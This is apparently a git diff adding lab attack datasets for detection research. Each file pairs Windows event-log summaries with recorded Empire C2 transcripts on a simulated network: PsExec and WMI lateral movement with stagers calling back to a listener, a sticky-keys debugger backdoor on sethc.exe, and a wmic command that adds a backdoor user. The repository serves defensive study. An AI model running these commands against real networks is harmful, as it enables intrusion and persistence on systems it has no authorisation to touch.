PowerShell | Pipeline Execution Details | 574 | +| Windows PowerShell | PowerShell | Provider Lifecycle | 14 | +| Windows PowerShell | PowerShell | Engine Lifecycle | 2 | +| System | Service Control Manager | na | 3 | +| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 169 | +| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 91 | +| Security | Microsoft-Windows-Security-Auditing | Registry | 32 | +| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 10 | +| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 6 | +| Security | Microsoft-Windows-Security-Auditing | Process Creation | 6 | +| Security | Microsoft-Windows-Security-Auditing | Logoff | 5 | +| Security | Microsoft-Windows-Security-Auditing | Sensitive Privilege Use | 5 | +| Security | Microsoft-Windows-Security-Auditing | Group Membership | 4 | +| Security | Microsoft-Windows-Security-Auditing | Logon | 4 | +| Security | Microsoft-Windows-Security-Auditing | Special Logon | 4 | +| Security | Microsoft-Windows-Security-Auditing | Removable Storage | 3 | +| Security | Microsoft-Windows-Security-Auditing | Kerberos Service Ticket Operations | 1 | +| Security | Microsoft-Windows-Security-Auditing | Process Termination | 1 | +| Security | Microsoft-Windows-Security-Auditing | Security System Extension | 1 | +| Microsoft-Windows-WMI-Activity/Operational | Microsoft-Windows-WMI-Activity | na | 3 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 455 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 423 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 329 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 152 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 24 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 20 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 14 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 6 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | RawAccessRead detected (rule: RawAccessRead) | 2 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Created (rule: PipeEvent) | 1 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process terminated (rule: ProcessTerminate) | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 498 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | PowerShell Console Startup | 2 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Execute a Remote Command | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | PowerShell Named Pipe IPC | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Starting Command | 1 | + +## Attacker Activity + +``` +(Empire: V6W3TH8Y) > usemodule lateral_movement/invoke_psexec +(Empire: powershell/lateral_movement/invoke_psexec) > +(Empire: powershell/lateral_movement/invoke_psexec) > info + + Name: Invoke-PsExec + Module: powershell/lateral_movement/invoke_psexec + NeedsAdmin: False + OpsecSafe: False + Language: powershell +MinLanguageVersion: 2 + Background: True + OutputExtension: None + +Authors: + @harmj0y + +Description: + Executes a stager on remote hosts using PsExec type + functionality. + +Comments: + https://github.com/rapid7/metasploit- + framework/blob/master/tools/psexec.rb + +Options: + + Name Required Value Description + ---- -------- ------- ----------- + Listener False Listener to use. + ProxyCreds False default Proxy credentials + ([domain\]username:password) to use for + request (default, none, or other). + ComputerName True Host[s] to execute the stager on, comma + separated. + ServiceName True Updater The name of the service to create. + Command False Custom command to execute on remote + hosts. + Proxy False default Proxy to use for request (default, none, + or other). + UserAgent False default User-agent string to use for the staging + request (default, none, or other). + Agent True V6W3TH8Y Agent to run module on. + ResultFile False Name of the file to write the results to + on agent machine. + +(Empire: powershell/lateral_movement/invoke_psexec) > set Listener https +(Empire: powershell/lateral_movement/invoke_psexec) > set ComputerName IT001.shire.com +(Empire: powershell/lateral_movement/invoke_psexec) > execute +[>] Module is not opsec safe, run? [y/N] y +[*] Tasked V6W3TH8Y to run TASK_CMD_JOB +[*] Agent V6W3TH8Y tasked with task ID 2 +[*] Tasked agent V6W3TH8Y to run module powershell/lateral_movement/invoke_psexec +(Empire: powershell/lateral_movement/invoke_psexec) > Job started: 9GY4PC +[*] Sending POWERSHELL stager (stage 1) to 10.0.10.103 +[*] New agent EXBNZYTS checked in +[+] Initial agent EXBNZYTS from 10.0.10.103 now active (Slack) +[*] Sending agent (stage 2) to EXBNZYTS at 10.0.10.103 + +(Empire: powershell/lateral_movement/invoke_psexec) > +(Empire: powershell/lateral_movement/invoke_psexec) > agents + +[*] Active agents: + + Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener + ---- -- ----------- ------------ -------- ------- --- ----- --------- ---------------- + H3DKB8SA ps 172.18.39.106 HR001 SHIRE\nmartha powershell 5172 5/0.0 2019-05-18 21:07:43 https + TKV35P8X ps 172.18.39.106 HR001 *SHIRE\nmartha powershell 5452 5/0.0 2019-05-18 21:07:42 https + EMDBFPSY ps 172.18.39.106 HR001 SHIRE\nmartha notepad 7924 5/0.0 2019-05-18 21:07:44 https + + V6W3TH8Y ps 172.18.39.106 HR001 SHIRE\pgustavo powershell 5204 5/0.0 2019-05-18 21:07:42 https + XSZ91N7T ps 172.18.39.105 IT001 *SHIRE\SYSTEM powershell 4172 5/0.0 2019-05-18 21:07:43 https + EXBNZYTS ps 172.18.39.105 IT001 *SHIRE\SYSTEM powershell 6728 5/0.0 2019-05-18 21:07:42 https + + +(Empire: agents) > +``` \ No newline at end of file diff --git a/small_datasets/windows/execution/service_execution_T1035/empire_invoke_psexec.tar.gz b/small_datasets/windows/execution/service_execution_T1035/empire_invoke_psexec.tar.gz new file mode 100644 index 00000000..0b9a3cf2 Binary files /dev/null and b/small_datasets/windows/execution/service_execution_T1035/empire_invoke_psexec.tar.gz differ diff --git a/small_datasets/windows/execution/windows_management_instrumentation_T1047/README.md b/small_datasets/windows/execution/windows_management_instrumentation_T1047/README.md new file mode 100644 index 00000000..f6bc2a81 --- /dev/null +++ b/small_datasets/windows/execution/windows_management_instrumentation_T1047/README.md @@ -0,0 +1,11 @@ +# Windows Management Instrumentation (WMI) + +Windows Management Instrumentation (WMI) is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135. + +## Technique Variations Table + +| Network | Dataset | Updated | +| ------- | --------- | ------- | +| shire | [empire_invoke_wmi](./empire_invoke_wmi.md) | 2019-05-18214442 | +| shire | [empire_invoke_wmi_debugger](./empire_invoke_wmi_debugger.md) | 2019-05-18215622 | +| shire | [empire_wmic_add_user_backdoor](./empire_wmic_add_user_backdoor.md) | 2019-05-18231333 | \ No newline at end of file diff --git a/small_datasets/windows/execution/windows_management_instrumentation_T1047/empire_invoke_wmi.md b/small_datasets/windows/execution/windows_management_instrumentation_T1047/empire_invoke_wmi.md new file mode 100644 index 00000000..933d4a7b --- /dev/null +++ b/small_datasets/windows/execution/windows_management_instrumentation_T1047/empire_invoke_wmi.md @@ -0,0 +1,143 @@ +# Empire Invoke WMI + +An adversary can use powershell to execute a stager via WMI + +## Technique(s) ID + +T1047 + +## Creators + +Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) + +## Dataset + +[empire_invoke_wmi.tar.gz](./empire_invoke_wmi.tar.gz) + +## Network Environment + +Shire + +## Time Taken + +2019-05-18214442 + +## About this file + +| log_name | source_name | task | record_number | +|--------------------------------------------|-------------------------------------|--------------------------------------------------------|-----------------| +| Windows PowerShell | PowerShell | Pipeline Execution Details | 834 | +| Windows PowerShell | PowerShell | Provider Lifecycle | 6 | +| Windows PowerShell | PowerShell | Engine Lifecycle | 1 | +| System | Microsoft-Windows-GroupPolicy | na | 1 | +| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 240 | +| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 105 | +| Security | Microsoft-Windows-Security-Auditing | Registry | 48 | +| Security | Microsoft-Windows-Security-Auditing | Sensitive Privilege Use | 30 | +| Security | Microsoft-Windows-Security-Auditing | Process Creation | 16 | +| Security | Microsoft-Windows-Security-Auditing | Other Object Access Events | 15 | +| Security | Microsoft-Windows-Security-Auditing | SAM | 14 | +| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 13 | +| Security | Microsoft-Windows-Security-Auditing | Process Termination | 13 | +| Security | Microsoft-Windows-Security-Auditing | Group Membership | 10 | +| Security | Microsoft-Windows-Security-Auditing | Logon | 10 | +| Security | Microsoft-Windows-Security-Auditing | Logoff | 9 | +| Security | Microsoft-Windows-Security-Auditing | Special Logon | 6 | +| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 4 | +| Security | Microsoft-Windows-Security-Auditing | File Share | 1 | +| Security | Microsoft-Windows-Security-Auditing | Other Logon/Logoff Events | 1 | +| Microsoft-Windows-WMI-Activity/Operational | Microsoft-Windows-WMI-Activity | na | 3 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 1276 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 793 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 709 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 223 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 80 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 29 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | RawAccessRead detected (rule: RawAccessRead) | 21 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 18 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 16 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process terminated (rule: ProcessTerminate) | 13 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Created (rule: PipeEvent) | 2 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 706 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | PowerShell Console Startup | 2 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Execute a Remote Command | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | PowerShell Named Pipe IPC | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Starting Command | 1 | + +## Attacker Activity + +``` +(Empire: V6W3TH8Y) > usemodule lateral_movement/invoke_wmi +(Empire: powershell/lateral_movement/invoke_wmi) > info + + Name: Invoke-WMI + Module: powershell/lateral_movement/invoke_wmi + NeedsAdmin: False + OpsecSafe: True + Language: powershell +MinLanguageVersion: 2 + Background: False + OutputExtension: None + +Authors: + @harmj0y + +Description: + Executes a stager on remote hosts using WMI. + +Options: + + Name Required Value Description + ---- -------- ------- ----------- + Listener True Listener to use. + CredID False CredID from the store to use. + ComputerName True Host[s] to execute the stager on, comma + separated. + Proxy False default Proxy to use for request (default, none, + or other). + UserName False [domain\]username to use to execute + command. + ProxyCreds False default Proxy credentials + ([domain\]username:password) to use for + request (default, none, or other). + UserAgent False default User-agent string to use for the staging + request (default, none, or other). + Password False Password to use to execute command. + Agent True V6W3TH8Y Agent to run module on. + +(Empire: powershell/lateral_movement/invoke_wmi) > set Listener https +(Empire: powershell/lateral_movement/invoke_wmi) > set ComputerName IT001.shire.com +(Empire: powershell/lateral_movement/invoke_wmi) > execute +[*] Tasked V6W3TH8Y to run TASK_CMD_WAIT +[*] Agent V6W3TH8Y tasked with task ID 6 +[*] Tasked agent V6W3TH8Y to run module powershell/lateral_movement/invoke_wmi +(Empire: powershell/lateral_movement/invoke_wmi) > Invoke-Wmi executed on "IT001.shire.com" +[*] Sending POWERSHELL stager (stage 1) to 10.0.10.103 +[*] New agent ZLPB8CV3 checked in +[+] Initial agent ZLPB8CV3 from 10.0.10.103 now active (Slack) +[*] Sending agent (stage 2) to ZLPB8CV3 at 10.0.10.103 + +(Empire: powershell/lateral_movement/invoke_wmi) > agents + +[*] Active agents: + + Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener + ---- -- ----------- ------------ -------- ------- --- ----- --------- ---------------- + H3DKB8SA ps 172.18.39.106 HR001 SHIRE\nmartha powershell 5172 5/0.0 2019-05-18 21:45:47 https + TKV35P8X ps 172.18.39.106 HR001 *SHIRE\nmartha powershell 5452 5/0.0 2019-05-18 21:45:44 https + EMDBFPSY ps 172.18.39.106 HR001 SHIRE\nmartha notepad 7924 5/0.0 2019-05-18 21:45:43 https + + V6W3TH8Y ps 172.18.39.106 HR001 SHIRE\pgustavo powershell 5204 5/0.0 2019-05-18 21:45:43 https + 38APWSR1 ps 172.18.39.105 IT001 *SHIRE\pgustavo MSBuild 5656 5/0.0 2019-05-18 21:45:46 https + ZLPB8CV3 ps 172.18.39.105 IT001 *SHIRE\pgustavo powershell 5804 5/0.0 2019-05-18 21:45:44 https + + +(Empire: agents) > interact ZLPB8CV3 +(Empire: ZLPB8CV3) > shell whoami +[*] Tasked ZLPB8CV3 to run TASK_SHELL +[*] Agent ZLPB8CV3 tasked with task ID 1 +(Empire: ZLPB8CV3) > shire\pgustavo +..Command execution completed. + +(Empire: ZLPB8CV3) > +``` \ No newline at end of file diff --git a/small_datasets/windows/lateral_movement/windows_management_instrumentation_T1047/empire_invoke_wmi.tar.gz b/small_datasets/windows/execution/windows_management_instrumentation_T1047/empire_invoke_wmi.tar.gz similarity index 100% rename from small_datasets/windows/lateral_movement/windows_management_instrumentation_T1047/empire_invoke_wmi.tar.gz rename to small_datasets/windows/execution/windows_management_instrumentation_T1047/empire_invoke_wmi.tar.gz diff --git a/small_datasets/windows/execution/windows_management_instrumentation_T1047/empire_invoke_wmi_debugger.md b/small_datasets/windows/execution/windows_management_instrumentation_T1047/empire_invoke_wmi_debugger.md new file mode 100644 index 00000000..f469facc --- /dev/null +++ b/small_datasets/windows/execution/windows_management_instrumentation_T1047/empire_invoke_wmi_debugger.md @@ -0,0 +1,157 @@ +# Empire Invoke WMI Debugger + +Uses WMI to set the debugger for a target binary on a remote machine to be cmd.exe or a stager. + +## Technique(s) ID + +T1047 + +## Creators + +Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) + +## Dataset + +[empire_invoke_wmi_debugger.tar.gz](./empire_invoke_wmi_debugger.tar.gz) + +## Network Environment + +Shire + +## Time Taken + +2019-05-18215622 + +## About this file + +| log_name | source_name | task | record_number | +|--------------------------------------------|-------------------------------------|--------------------------------------------------------|-----------------| +| Windows PowerShell | PowerShell | Pipeline Execution Details | 539 | +| Windows PowerShell | PowerShell | Provider Lifecycle | 6 | +| Windows PowerShell | PowerShell | Engine Lifecycle | 2 | +| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 172 | +| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 131 | +| Security | Microsoft-Windows-Security-Auditing | Registry | 40 | +| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 11 | +| Security | Microsoft-Windows-Security-Auditing | Group Membership | 10 | +| Security | Microsoft-Windows-Security-Auditing | Logon | 10 | +| Security | Microsoft-Windows-Security-Auditing | Special Logon | 10 | +| Security | Microsoft-Windows-Security-Auditing | Logoff | 9 | +| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 8 | +| Security | Microsoft-Windows-Security-Auditing | Process Creation | 7 | +| Security | Microsoft-Windows-Security-Auditing | Sensitive Privilege Use | 5 | +| Security | Microsoft-Windows-Security-Auditing | Process Termination | 3 | +| Microsoft-Windows-WMI-Activity/Operational | Microsoft-Windows-WMI-Activity | na | 4 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 1920 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 325 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 312 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 156 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 23 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 19 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 14 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 7 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process terminated (rule: ProcessTerminate) | 3 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Created (rule: PipeEvent) | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 449 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Starting Command | 3 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Stopping Command | 3 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Execute a Remote Command | 2 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | PowerShell Console Startup | 2 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | PowerShell Named Pipe IPC | 1 | + +## Attacker Activity + +``` +(Empire: V6W3TH8Y) > usemodule lateral_movement/invoke_wmi_debugger +(Empire: powershell/lateral_movement/invoke_wmi_debugger) > info + + Name: Invoke-WMIDebugger + Module: powershell/lateral_movement/invoke_wmi_debugger + NeedsAdmin: False + OpsecSafe: False + Language: powershell +MinLanguageVersion: 2 + Background: False + OutputExtension: None + +Authors: + @harmj0y + +Description: + Uses WMI to set the debugger for a target binary on a remote + machine to be cmd.exe or a stager. + +Options: + + Name Required Value Description + ---- -------- ------- ----------- + Listener False Listener to use. + CredID False CredID from the store to use. + ComputerName True Host[s] to execute the stager on, comma + separated. + Cleanup False Switch. Disable the debugger for the + specified TargetBinary. + TargetBinary True sethc.exe Target binary to set the debugger for + (sethc.exe, Utilman.exe, osk.exe, + Narrator.exe, or Magnify.exe) + UserName False [domain\]username to use to execute + command. + Binary False C:\Windows\System32\cmd. Binary to set for the debugger. + exe + RegPath False HKLM:Software\Microsoft\ Registry location to store the script + Network\debug code. Last element is the key name. + Password False Password to use to execute command. + Agent True V6W3TH8Y Agent to run module on. + +(Empire: powershell/lateral_movement/invoke_wmi_debugger) > set Listener https +(Empire: powershell/lateral_movement/invoke_wmi_debugger) > set ComputerName IT001.shire.com +(Empire: powershell/lateral_movement/invoke_wmi_debugger) > set Listener '' +(Empire: powershell/lateral_movement/invoke_wmi_debugger) > info + + Name: Invoke-WMIDebugger + Module: powershell/lateral_movement/invoke_wmi_debugger + NeedsAdmin: False + OpsecSafe: False + Language: powershell +MinLanguageVersion: 2 + Background: False + OutputExtension: None + +Authors: + @harmj0y + +Description: + Uses WMI to set the debugger for a target binary on a remote + machine to be cmd.exe or a stager. + +Options: + + Name Required Value Description + ---- -------- ------- ----------- + Listener False Listener to use. + CredID False CredID from the store to use. + ComputerName True IT001.shire.com Host[s] to execute the stager on, comma + separated. + Cleanup False Switch. Disable the debugger for the + specified TargetBinary. + TargetBinary True sethc.exe Target binary to set the debugger for + (sethc.exe, Utilman.exe, osk.exe, + Narrator.exe, or Magnify.exe) + UserName False [domain\]username to use to execute + command. + Binary False C:\Windows\System32\cmd. Binary to set for the debugger. + exe + RegPath False HKLM:Software\Microsoft\ Registry location to store the script + Network\debug code. Last element is the key name. + Password False Password to use to execute command. + Agent True V6W3TH8Y Agent to run module on. + +(Empire: powershell/lateral_movement/invoke_wmi_debugger) > execute +[>] Module is not opsec safe, run? [y/N] y +[*] Tasked V6W3TH8Y to run TASK_CMD_WAIT +[*] Agent V6W3TH8Y tasked with task ID 7 +[*] Tasked agent V6W3TH8Y to run module powershell/lateral_movement/invoke_wmi_debugger +(Empire: powershell/lateral_movement/invoke_wmi_debugger) > Invoke-Wmi executed on "IT001.shire.com" to set the debugger for sethc.exe to be C:\Windows\System32\cmd.exe. + +(Empire: powershell/lateral_movement/invoke_wmi_debugger) > +``` \ No newline at end of file diff --git a/small_datasets/windows/execution/windows_management_instrumentation_T1047/empire_invoke_wmi_debugger.tar.gz b/small_datasets/windows/execution/windows_management_instrumentation_T1047/empire_invoke_wmi_debugger.tar.gz new file mode 100644 index 00000000..311f678c Binary files /dev/null and b/small_datasets/windows/execution/windows_management_instrumentation_T1047/empire_invoke_wmi_debugger.tar.gz differ diff --git a/small_datasets/windows/execution/windows_management_instrumentation_T1047/empire_wmic_add_user.tar.gz b/small_datasets/windows/execution/windows_management_instrumentation_T1047/empire_wmic_add_user.tar.gz new file mode 100644 index 00000000..f268e895 Binary files /dev/null and b/small_datasets/windows/execution/windows_management_instrumentation_T1047/empire_wmic_add_user.tar.gz differ diff --git a/small_datasets/windows/execution/windows_management_instrumentation_T1047/empire_wmic_add_user_backoor.md b/small_datasets/windows/execution/windows_management_instrumentation_T1047/empire_wmic_add_user_backoor.md new file mode 100644 index 00000000..c966064e --- /dev/null +++ b/small_datasets/windows/execution/windows_management_instrumentation_T1047/empire_wmic_add_user_backoor.md @@ -0,0 +1,83 @@ +# Empire WMIC Add User Backdoor + +Adversaries can use wmic to remotely execute code and add a backdoor user for persistence. + +## Technique(s) ID + +T1047 + +## Creators + +Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) + +## Dataset + +[empire_wmic_add_user.tar.gz](./empire_wmic_add_user.tar.gz) + +## Network Environment + +Shire + +## Time Taken + +2019-05-18231333 + +## About this file + +| log_name | source_name | task | record_number | +|--------------------------------------------|-------------------------------------|--------------------------------------------------------|-----------------| +| Windows PowerShell | PowerShell | Pipeline Execution Details | 578 | +| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 193 | +| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 129 | +| Security | Microsoft-Windows-Security-Auditing | Registry | 32 | +| Security | Microsoft-Windows-Security-Auditing | Detailed File Share | 26 | +| Security | Microsoft-Windows-Security-Auditing | Logon | 25 | +| Security | Microsoft-Windows-Security-Auditing | Group Membership | 24 | +| Security | Microsoft-Windows-Security-Auditing | Logoff | 22 | +| Security | Microsoft-Windows-Security-Auditing | Special Logon | 12 | +| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 8 | +| Security | Microsoft-Windows-Security-Auditing | Process Termination | 7 | +| Security | Microsoft-Windows-Security-Auditing | Process Creation | 6 | +| Security | Microsoft-Windows-Security-Auditing | Sensitive Privilege Use | 6 | +| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 4 | +| Security | Microsoft-Windows-Security-Auditing | File Share | 3 | +| Security | Microsoft-Windows-Security-Auditing | User Account Management | 3 | +| Security | Microsoft-Windows-Security-Auditing | Kerberos Service Ticket Operations | 2 | +| Security | Microsoft-Windows-Security-Auditing | Security Group Management | 2 | +| Security | Microsoft-Windows-Security-Auditing | Kerberos Authentication Service | 1 | +| Security | Microsoft-Windows-Security-Auditing | Other Object Access Events | 1 | +| Security | Microsoft-Windows-Security-Auditing | SAM | 1 | +| Microsoft-Windows-WMI-Activity/Operational | Microsoft-Windows-WMI-Activity | na | 4 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 289 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 212 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 178 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 138 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 30 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 18 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process terminated (rule: ProcessTerminate) | 7 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 6 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 4 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Created (rule: PipeEvent) | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 481 | + +## Attacker Activity + +``` +(Empire: V6W3TH8Y) > shell wmic /node:IT001 process call create "net user /add backdoor pa$$w0rd1" +[*] Tasked V6W3TH8Y to run TASK_SHELL +[*] Agent V6W3TH8Y tasked with task ID 12 +(Empire: V6W3TH8Y) > Executing (Win32_Process)->Create() + +Method execution successful. + +Out Parameters: +instance of __PARAMETERS +{ + ProcessId = 6580; + ReturnValue = 0; +}; + +..Command execution completed. + +(Empire: V6W3TH8Y) > +``` \ No newline at end of file diff --git a/small_datasets/windows/lateral_movement/distributed_component_object_model_T1175/README.md b/small_datasets/windows/lateral_movement/distributed_component_object_model_T1175/README.md new file mode 100644 index 00000000..f705389f --- /dev/null +++ b/small_datasets/windows/lateral_movement/distributed_component_object_model_T1175/README.md @@ -0,0 +1,11 @@ +# Distributed Component Object Model + +Windows Distributed Component Object Model (DCOM) is transparent middleware that extends the functionality of Component Object Model (COM) beyond a local computer using remote procedure call (RPC) technology. COM is a component of the Windows application programming interface (API) that enables interaction between software objects. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE). + +Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry. By default, only Administrators may remotely activate and launch COM objects through DCOM. Adversaries may use DCOM for lateral movement. + +## Technique Variations Table + +| Network | Dataset | Updated | +| ------- | --------- | ------- | +| shire | [empire_invoke_dcom](./empire_invoke_dcom.md) | 2019-05-18211052 | \ No newline at end of file diff --git a/small_datasets/windows/lateral_movement/distributed_component_object_model_T1175/empire_invoke_dcom.md b/small_datasets/windows/lateral_movement/distributed_component_object_model_T1175/empire_invoke_dcom.md new file mode 100644 index 00000000..ec91c888 --- /dev/null +++ b/small_datasets/windows/lateral_movement/distributed_component_object_model_T1175/empire_invoke_dcom.md @@ -0,0 +1,138 @@ +# Empire Ivoke DCOM + +Invoke commands on remote hosts via MMC20.Application COM object over DCOM. + +## Technique(s) ID + +T1175 + +## Creators + +Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) + +## Dataset + +[empire_invoke_dcom.tar.gz](./empire_invoke_dcom.tar.gz) + +## Network Environment + +Shire + +## Time Taken + +2019-05-18211052 + +## About this file + +| log_name | source_name | task | record_number | +|--------------------------------------------|-------------------------------------|--------------------------------------------------------|-----------------| +| Windows PowerShell | PowerShell | Pipeline Execution Details | 1042 | +| Windows PowerShell | PowerShell | Provider Lifecycle | 6 | +| Windows PowerShell | PowerShell | Engine Lifecycle | 1 | +| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 302 | +| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 127 | +| Security | Microsoft-Windows-Security-Auditing | Registry | 35 | +| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 11 | +| Security | Microsoft-Windows-Security-Auditing | Group Membership | 10 | +| Security | Microsoft-Windows-Security-Auditing | Logon | 10 | +| Security | Microsoft-Windows-Security-Auditing | Special Logon | 10 | +| Security | Microsoft-Windows-Security-Auditing | Process Creation | 8 | +| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 7 | +| Security | Microsoft-Windows-Security-Auditing | Kerberos Service Ticket Operations | 7 | +| Security | Microsoft-Windows-Security-Auditing | Logoff | 7 | +| Security | Microsoft-Windows-Security-Auditing | Process Termination | 7 | +| Security | Microsoft-Windows-Security-Auditing | Removable Storage | 6 | +| Security | Microsoft-Windows-Security-Auditing | Sensitive Privilege Use | 5 | +| Security | Microsoft-Windows-Security-Auditing | Detailed File Share | 1 | +| Security | Microsoft-Windows-Security-Auditing | File Share | 1 | +| Security | Microsoft-Windows-Security-Auditing | Other Object Access Events | 1 | +| Microsoft-Windows-WMI-Activity/Operational | Microsoft-Windows-WMI-Activity | na | 3 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 1120 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 518 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: 